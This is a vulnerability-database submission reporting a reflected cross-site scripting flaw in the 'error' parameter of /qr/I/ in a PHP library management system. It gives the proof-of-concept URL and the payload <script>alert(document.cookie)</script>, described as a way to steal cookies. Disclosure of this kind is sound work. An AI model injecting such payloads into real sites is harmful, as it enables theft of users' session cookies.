提出 #43299: Library Management System front desk /qr/I/ Cross Site Script情報

タイトルLibrary Management System front desk /qr/I/ Cross Site Script
説明info:Library Management System front desk /qr/I/ Cross Site Script The parameter in index.php of this page is error parameter is not filtered, which can directly xss attack to steal cookie information Direct access to the page address: http://192.168.153.1:8090/qr/I/?error=123 Then replace 123 with xss code <script>alert(document.cookie)</script> Access address: http://192.168.153.1:8090/qr/I/?error=<script>alert(document.cookie)</script> XSS can be achieved payload: /qr/I/?error=<script>alert(document.cookie)</script>
ソース⚠️ https:// www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html
ユーザー
 jsbae3449 (UID 30775)
送信2022年08月10日 11:23 (4 年 ago)
モデレーション2022年08月11日 11:04 (24 hours later)
ステータス承諾済み
VulDBエントリ206164 [SourceCodester Library Management System /qr/I/ エラー クロスサイトスクリプティング]
ポイント20

概要

Interested in the pricing of exploits?

See the underground prices here!